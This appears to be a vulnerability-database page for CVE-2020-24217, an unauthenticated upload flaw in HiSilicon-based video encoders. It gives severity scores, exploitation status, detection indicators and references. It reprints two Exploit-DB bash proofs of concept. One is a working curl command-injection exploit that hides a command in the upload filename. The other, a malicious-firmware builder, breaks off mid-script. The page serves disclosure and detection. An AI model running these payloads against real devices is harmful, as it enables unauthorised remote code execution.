CVE-2020-24217
published 2020-10-06CVE-2020-24217: An issue was discovered in the box application on HiSilicon based IPTV/H.264/H.265 video encoders. The file-upload endpoint does not enforce authentication…
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
38.96%
98.4th percentile
An issue was discovered in the box application on HiSilicon based IPTV/H.264/H.265 video encoders. The file-upload endpoint does not enforce authentication. Attackers can send an unauthenticated HTTP request to upload a custom firmware component, possibly in conjunction with command injection, to achieve arbitrary code execution.
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated HTTP POST requests to the firmware/logo upload endpoint containing the 'upgrade' multipart form field — no authentication headers required by the vulnerable device. ↗
- →Detect multipart form-data POST requests where the 'upgrade' field filename contains semicolons, indicating command injection attempt (e.g., filename pattern: logo;<cmd>;.png). ↗
- →Detect upload of RAR archive files (magic bytes or Content-Type) to the firmware upgrade endpoint on HiSilicon-based IPTV/H.264/H.265 encoders, as malicious firmware can be delivered as a RAR file. ↗
- →Flag HTTP requests to HiSilicon encoder web interfaces that use multipart/form-data with field name 'upgrade' without any session cookie or Authorization header present. ↗
- ·The exploit targets multiple vendor OEM devices all based on the same HiSilicon chipset; the vulnerable upload endpoint path is not explicitly specified in the sources, requiring fingerprinting of the target device's web interface to confirm the exact endpoint. ↗
- ·The firmware version is described as vendor-specific; there is no single universal version string to match — detection must rely on behavioral indicators (unauthenticated upload) rather than version matching alone. ↗
- ·Command injection is embedded inside the filename parameter of the multipart upload, possibly in conjunction with firmware upload; both attack vectors must be monitored independently. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vwf4-cwv7-v664: An issue was discovered in the box application on HiSilicon based IPTV/H
ghsa_unreviewed·2022-05-24
CVE-2020-24217 [CRITICAL] CWE-306 GHSA-vwf4-cwv7-v664: An issue was discovered in the box application on HiSilicon based IPTV/H
An issue was discovered in the box application on HiSilicon based IPTV/H.264/H.265 video encoders. The file-upload endpoint does not enforce authentication. Attackers can send an unauthenticated HTTP request to upload a custom firmware component, possibly in conjunction with command injection, to achieve arbitrary code execution.
VulnCheck
szuray iptv\/h.264_video_encoder_firmware Missing Authentication for Critical Function
vulncheck·2020·CVSS 9.8
CVE-2020-24217 [CRITICAL] szuray iptv\/h.264_video_encoder_firmware Missing Authentication for Critical Function
szuray iptv\/h.264_video_encoder_firmware Missing Authentication for Critical Function
An issue was discovered in the box application on HiSilicon based IPTV/H.264/H.265 video encoders. The file-upload endpoint does not enforce authentication. Attackers can send an unauthenticated HTTP request to upload a custom firmware component, possibly in conjunction with command injection, to achieve arbitrary code execution.
Affected: szuray iptv\/h.264_video_encoder_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.bleepingcomputer.com/news/security/reverse-shell-botnet-gitpaste-12-spreads-via-github-and-pastebin/#google_vignette
No detection rules found.
Exploit-DB
HiSilicon Video Encoders - RCE via unauthenticated command injection
exploitdb·2020-10-19·CVSS 9.8
CVE-2020-24217 [CRITICAL] HiSilicon Video Encoders - RCE via unauthenticated command injection
HiSilicon Video Encoders - RCE via unauthenticated command injection
---
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 [:] "
exit 1
fi
printf "executing the command... "
if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null
then
echo "SUCCESS: remote command executed"
else
echo "ERROR: $?"
fi
Exploit-DB
HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
exploitdb·2020-10-19·CVSS 9.8
CVE-2020-24217 [CRITICAL] HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
---
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 [:] "
exit 1
fi
printf "creating uk.rar... "
echo "$2" > uk.txt
rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; }
echo "done"
rm uk.txt
pr
No writeups or analysis indexed.
http://packetstormsecurity.com/files/159597/HiSilicon-Video-Encoder-Command-Injection.htmlhttp://packetstormsecurity.com/files/159599/HiSilicon-Video-Encoder-Malicious-Firmware-Code-Execution.htmlhttps://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/https://www.kb.cert.org/vuls/id/896979http://packetstormsecurity.com/files/159597/HiSilicon-Video-Encoder-Command-Injection.htmlhttp://packetstormsecurity.com/files/159599/HiSilicon-Video-Encoder-Malicious-Firmware-Code-Execution.htmlhttps://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/https://www.kb.cert.org/vuls/id/896979
2020-10-06
Published
Exploited in the wild